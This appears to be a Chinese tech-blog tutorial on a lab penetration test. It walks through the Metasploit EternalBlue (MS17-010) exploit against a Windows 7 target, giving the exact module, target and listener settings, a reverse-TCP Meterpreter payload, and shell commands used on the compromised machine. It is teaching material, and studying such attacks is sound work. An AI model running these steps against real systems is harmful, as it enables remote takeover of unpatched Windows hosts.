IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 系统运维 -> 网络服务器攻击渗透测试 -> 正文阅读

[系统运维]网络服务器攻击渗透测试

环境:
靶机:win7(x64)
攻击机:linux2020.2
(在内网中测试)

步骤:
一、在kali终端输入:msfconsole(启动有点久)

二、直接输入指令搜索:search ms17_010
(之前的永恒之蓝)

下一步用下面第二个模块
在这里插入图片描述
三、通过use来使用该模块,所以输入指令 :
use exploit/windows/smb/ms17_010_eternalblue
得到如下,可以看到RHOSTS(目标主机ip)和LHOST (本地ip)两个参数需要配置,其他的默认,目标端口已经默认为445。
在这里插入图片描述
三、现在开始配置RHOSTS、LHOST、payload
输入以下指令配置:
1、set RHOSTS 192.168.0.15
2、set LHOST 192.168.0.14
3、set payload windows/x64/meterpreter/reverse_tcp(这里用的是反向连接,比较常用)

四、配置成功后输入show options查看配置
可以看到下图已经配置成功
在这里插入图片描述
五、接下来就可以run了
输入run回车等待一会
在这里插入图片描述
六、看到下图已经拿到权限。
在这里插入图片描述
最后输入shell登录到目标机,就可以对目标机进行各种操控,例如查看文件,创建文件夹等等。

例如:
输入指令cd C:\进入C盘目录下
输入指令md muma创建名为muma的文件夹
输入指令dir查看C盘文件,下图可以看到已经在目标机C盘里创建了muma文件夹在这里插入图片描述

在这里插入图片描述

  系统运维 最新文章
配置小型公司网络WLAN基本业务(AC通过三层
如何在交付运维过程中建立风险底线意识,提
快速传输大文件,怎么通过网络传大文件给对
从游戏服务端角度分析移动同步(状态同步)
MySQL使用MyCat实现分库分表
如何用DWDM射频光纤技术实现200公里外的站点
国内顺畅下载k8s.gcr.io的镜像
自动化测试appium
ctfshow ssrf
Linux操作系统学习之实用指令(Centos7/8均
上一篇文章      下一篇文章      查看所有文章
加:2021-08-13 12:43:23  更:2021-08-13 12:47:47 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年12日历 -2024/12/28 19:14:42-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码
数据统计